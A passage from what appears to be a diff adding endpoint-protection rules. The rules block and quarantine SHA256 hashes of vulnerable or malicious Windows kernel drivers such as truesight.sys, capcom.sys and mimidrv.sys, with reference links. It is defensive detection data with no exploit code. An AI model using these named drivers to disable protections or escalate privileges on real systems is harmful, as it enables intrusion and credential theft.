+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74",
+ "comment": "Vulnerable Kernel Driver (aka PanIOx64.sys) [https://www.loldrivers.io/drivers/93c84c08-4683-493d-abf7-22dc2d1cb567/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5d3ef2a-d9f6-510f-9847-e89d3e98b3e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814066Z",
+ "creation_date": "2026-03-23T11:45:31.814069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89f59c4e933d8d39133a7c6505b28c774f72a92234d4a4228f17834dc7389307",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5d40ff1-8f13-5354-a023-926a43dc0fa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621350Z",
+ "creation_date": "2026-03-23T11:45:29.621352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "906d8412b357379db9512e3f584fcda1f788acc1337e5b4d4eff5e6fa59324a6",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5eff58b-3ced-524d-b433-4e1046cbe0fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832764Z",
+ "creation_date": "2026-03-23T11:45:30.832766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "286a58f44c92c7d30f0aa61c959889a439e93cbc487f447306be06b20825b7c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c612c7df-d9f9-5551-8eb7-3ff8eb679766",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618133Z",
+ "creation_date": "2026-03-23T11:45:29.618135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79aa2cedd1b8415ba6d00f4b3601e2363c8bdd07f860a3b8de010f9e5187c0e9",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c61ef844-42bf-569f-b0be-ee208967a37e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156860Z",
+ "creation_date": "2026-03-23T11:45:31.156862Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d6c2b4360c50e865572f736c262601b8ae92ebea8c2d4428dc6dddefa2a570d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c62259cb-056a-530e-a73a-e56fb274c675",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820408Z",
+ "creation_date": "2026-03-23T11:45:31.820411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfb9e69e73e12b098be099971e13f41d5b1de3509c0b3578a1192f6cd28d73fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6230b77-721b-530b-b10c-1ffdb6ce1ce1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978493Z",
+ "creation_date": "2026-03-23T11:45:29.978495Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ce44d1643bc4d87e5029a4927613035bbd96b4e45a2400aed987396115791f7",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c62b1b04-67f9-5b6a-9cc4-58bbee85d03a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826561Z",
+ "creation_date": "2026-03-23T11:45:31.826563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24d83f41ff581dc60a415e120a116d5eff990ef1b69aa9fe789fb3267a426b0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c646f6d8-0f0b-5918-a915-84669bdf6b85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622332Z",
+ "creation_date": "2026-03-23T11:45:29.622333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac63c26ca43701dddaa7fb1aea535d42190f88752900a03040fd5aaa24991e25",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c64967b4-9f69-5453-93e3-4ab401019d71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620727Z",
+ "creation_date": "2026-03-23T11:45:29.620729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6540105-56a5-53b6-bf42-786684afeb95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822159Z",
+ "creation_date": "2026-03-23T11:45:31.822162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4d236ed7c038b4e10fbe8450ef16a742e8d676a3ace46b277d362afa353f5b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c65ad857-a81f-5b4b-9000-16b474a59930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972125Z",
+ "creation_date": "2026-03-23T11:45:29.972127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de3597ae7196ca8c0750dce296a8a4f58893774f764455a125464766fcc9b3b5",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6902eef-c776-5c7c-806c-8815ef29c1aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819620Z",
+ "creation_date": "2026-03-23T11:45:30.819622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a47555d04b375f844073fdcc71e5ccaa1bbb201e24dcdebe2399e055e15c849f",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c694bd3b-3829-5964-91c9-5ce270c0c7c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835463Z",
+ "creation_date": "2026-03-23T11:45:30.835466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac258fa5a7211a4785242948f9055eca6e7177ccbd7b8d109c18d09d8db1e1d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6a67b3b-8d8e-57df-a827-271916379d95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606209Z",
+ "creation_date": "2026-03-23T11:45:29.606211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d5ebd0f4585ec20a5fe3c5276df13ece5a2645d3d6f70cedcda979bd1248fc2",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6aa65a4-cc68-5b6e-aae7-8c80a29eb84b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490802Z",
+ "creation_date": "2026-03-23T11:45:31.490805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d0ad33174b9749167b5f5433429c01e2628772e283913602ac0b912b12bd54f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6b1f2eb-f20d-5c37-b0e1-91e329f78a62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479350Z",
+ "creation_date": "2026-03-23T11:45:30.479352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bb0418dcfb3fa15f01220dc039f2c9ad4dc12eb7f0396deaa9b2e81cb5e77e9",
+ "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv_1_0_32.sys) [https://www.loldrivers.io/drivers/02e4a30f-8aa8-4ff0-8e02-1bff1d0f088f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6b9bc7a-20ac-52cb-8548-ec2cb9a2ab9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829663Z",
+ "creation_date": "2026-03-23T11:45:31.829665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829670Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0a7160d94f89e3d8e05e60e0d83effe9cf7eb4ec57332262a9bcbe8d2a28c03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6e3f4e4-982b-5f84-b191-18cdf6292cc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466836Z",
+ "creation_date": "2026-03-23T11:45:30.466839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "773b4a1efb9932dd5116c93d06681990759343dfe13c0858d09245bc610d5894",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6ea4fde-ed4a-5c04-95a1-9f10bf16b514",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622122Z",
+ "creation_date": "2026-03-23T11:45:29.622124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "faa08cb609a5b7be6bfdb61f1e4a5e8adf2f5a1d2492f262483df7326934f5d4",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6fce826-ca27-5c3f-b46a-7cd1694c5e80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144305Z",
+ "creation_date": "2026-03-23T11:45:31.144307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "614885fc4266dd1f9c226122b53cb75091160eadad62fe49847a700402d3d2e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c6fe2be1-565d-5e3b-9ae8-fb49b1669d71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980550Z", + "creation_date": "2026-03-23T11:45:29.980552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9e0f35da47fe91d887a28a0670d8e79ceef7c61ff6d9af3d0568a9737fe0673", + "comment": "Vulnerable Kernel Driver (aka 